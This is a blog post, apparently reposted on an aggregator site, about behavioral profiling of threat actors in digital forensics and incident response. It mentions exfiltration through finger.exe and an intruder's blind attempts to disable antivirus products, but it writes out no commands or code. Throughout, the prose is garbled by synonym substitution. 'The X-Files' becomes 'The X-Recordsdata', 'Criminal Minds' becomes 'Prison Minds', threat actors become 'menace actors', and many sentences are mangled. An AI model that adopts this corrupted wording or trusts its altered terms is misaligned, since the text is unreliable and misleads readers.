Thursday, May 23, 2024
HomeMicrosoft WindowsHuman Habits In Digital Forensics

Human Habits In Digital Forensics

I’ve all the time been a fan of books or exhibits the place somebody observe clues and develops an total image to cause them to their finish purpose. I’ve all the time just like the “sizzling on the path” mysteries, notably when the clues are assembled in a solution to perceive that the antagonist was going to do subsequent, what their subsequent seemingly transfer can be. Curiously sufficient, quite a lot of the exhibits I’ve watched have been centered across the FBI, exhibits like “The X-Recordsdata”, and “Prison Minds”. I do know intellectually that these exhibits are contrived, however assembling a path of technical bread crumbs to develop a profile of human habits is an interesting thought, and one thing I’ve tried to carry to my work in DFIR. 

Former FBI Supervisory Particular Agent and Behavioral Profiler Cameron Malin not too long ago shared that his latest endeavor, Modus Cyberandi, has gone stay! The principle focus of his effort, cyber habits profiling, is correct there on the prime of the principle internet web page. In reality, the principle internet web page even features a transient historical past of behavioral profiling.

This appears to be just like Len Opanashuk‘s endeavor, Motives Unlocked, which leads me to marvel, is that this a factor

Is that this one thing of us are occupied with?

Apparently ,it’s, as there’s analysis to recommend that that is, the truth is, the case. Think about this analysis paper describing behavioral proof evaluation as a “paradigm shift”, or this paper on idiographic digital profiling from the Journal of Digital Forensics, Safety, and Regulation, to call however a couple of. Additional, Google lists a variety of (principally tutorial) assets devoted to cyber behavioral profiling.

This matter appears to be talked about right here and there, so possibly there’s an curiosity on this form of evaluation, however the query is, is the curiosity extra tutorial, is the main focus extra area of interest (regulation enforcement), or is that this one thing that may be successfully leveraged within the non-public sector, notably the place digital forensics and intrusion intelligence intersect?

I ask the query, as that is one thing I’ve checked out for a while now, with the intention to not solely develop a greater understanding of focused menace actors who’re nonetheless lively throughout incident response, however to additionally decide the distinction between a menace actor’s actions through the response, and people of others concerned (IT employees, responders, legit customers of endpoints, and so on.). 

In a current touch upon social media, Cameron used the phrase, “…adversary evaluation and the way human habits renders in digital forensics…”, and it occurred to me that this actually does an important job of describing going past simply particular person knowledge factors and malware evaluation in DFIR, notably with regards to hands-on focused menace actors. By going past simply particular person knowledge factors and searching on the multifaceted, nuanced nature of these artifacts, we are able to start to discern patterns that inform us in regards to the intent, sophistication, and situational consciousness of the menace actor.

To that finish, Joe Slowik has appropriately said that there is a want in CTI (and DFIR, SOC, and so on.) to view indicators as composite objects, that issues like hashes and IP addresses have larger worth when different facets of their nature is known. Many instances we are likely to view IP addresses (and different indicators) one-dimensionally; nonetheless, there’s a lot extra about these indicators that may present perception to the menace actor behind them, akin to when, how, and in what context that IP handle was used. Was it the supply of a login, and in that case, what kind? Was it a C2 IP handle, or the supply of a obtain or add? If that’s the case, how…by way of HTTP, curl, msiexec, BITS, and so on?

Here is an instance of an IP handle; on this case, We are able to get some perception on this IP handle from VirusTotal, sufficient to know that we should always most likely concentrate. Nonetheless, in the event you learn the weblog put up, you will see that this IP handle was used because the goal for knowledge exfiltration. 

Through finger.exe.

Add to that the usage of the LOLBin is equivalent to what was described on this 2020 advisory, and it ought to be simple to see that we have gone properly past simply an IP handle, by this level, as we have began to unlock and reveal the composite nature of that indicator. 

The purpose of all that is that there is extra to the info we’ve obtainable than simply the one-dimensional perspective that we’re used to considering in, by which we have been viewing that knowledge. Now, if we start to include different knowledge sources which can be obtainable to us (EDR telemetry, endpoint knowledge and configurations, and so on.), we’ll being to see precisely how, as Cameron said, human habits renders in digital forensics. Among the issues I’ve pursued and been profitable in demonstration throughout earlier engagements consists of issues like hours of operations, most well-liked TTPs and approaches, sufficient so to separate the actions of two totally different menace actors on a single endpoint. 

I’ve additionally gained perception into the situational consciousness of a menace actor by observing how they reacted to stimulus; throughout one incident, the put in EDR framework was blocking the menace actor’s instruments from executing on totally different endpoints. The menace actor by no means bothered to question any of the three endpoints to find out what was blocking their makes an attempt; slightly, on one endpoint, they tried to disable Home windows Defender. On the second endpoint, they tried to delete a particular AV product, with out ever first figuring out if it was put in on the endpoint; the batch file they ran to delete all facets and variations of the product weren’t preceded by question instructions. Lastly, on the third endpoint, the menace actor ran a “spray-and-pray” batch file that tried to disable or delete a wide range of merchandise, none of which had been really put in on the endpoint. When none of those succeeded in permitting them to pursue their targets, they left.

So, sure, seen by way of the appropriate lens, with the appropriate perspective, human habits might be discerned by way of digital forensics. However the query stays…is this convenient? Is the perception that this method offers worthwhile to anybody?



Please enter your comment!
Please enter your name here

Most Popular

Recent Comments